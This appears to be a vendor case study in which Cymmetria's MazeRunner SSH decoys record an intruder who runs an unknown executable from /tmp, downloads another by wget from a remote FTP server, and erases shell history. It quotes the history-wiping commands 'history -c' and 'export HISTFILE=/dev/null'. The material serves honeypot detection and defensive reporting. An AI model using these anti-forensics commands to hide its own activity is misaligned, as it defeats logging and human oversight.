This past week, a MazeRunner Community Edition user, named Antonio, reached out to Cymmetria and asked us to help him deploy MazeRunner in his network. One of our developers worked with Antonio to help him get everything set up to his liking; this included helping him build his first deception campaign, which included two Internet-facing SSH decoys.
Within two days of launching his campaign, Antonio reached out to us again to say he had been receiving a lot of code execution alerts (this is quite common with Internet-facing decoys, and it can be difficult to discern relevant alerts from irrelevant ones). We requested that he export this data from MazeRunner and send it to us for review. When reviewing Antonio’s alert data, our developer was able to clearly see attempted attacks on both decoys. The attack data showed that, on the first decoy, the attacker uploaded an unknown executable to /tmp and executed it. We were able to detect this behavior using our unsigned code execution detection technique. A search conducted by our researchers seems to indicate that this executable had never before been observed in any other public database (for example, VirusTotal).
On the second decoy, our developer could see the attacker’s initial connection and that they ran some standard tools. Next, the attacker executed a ‘wget’ command in order to download an executable from a remote FTP server (MazeRunner recorded the attacker’s username and password for the FTP server). In the ‘wget’ command, the attacker included the username and password for their C&C server, thereby exposing those credentials to us as well. (We should note that we were able to discern that the attacker is human and not a bot by looking at the commands’ timestamps.) Trying to cover their tracks, the attacker then ran commands like ‘history -c’ and ‘export HISTFILE=/dev/null’ to delete their command history; however, MazeRunner decoys are fully instrumented forensic devices and record data in real-time, so the attack data was already recorded and saved.
Alerts log detailing attack activity
The result? We were able to detect the threat using the code signing technology that we developed in-house. MazeRunner caught the attacker, revealed their tools, and detailed their movement and actions. Even though the attacker covered their tracks by erasing their command history, MazeRunner was one step ahead.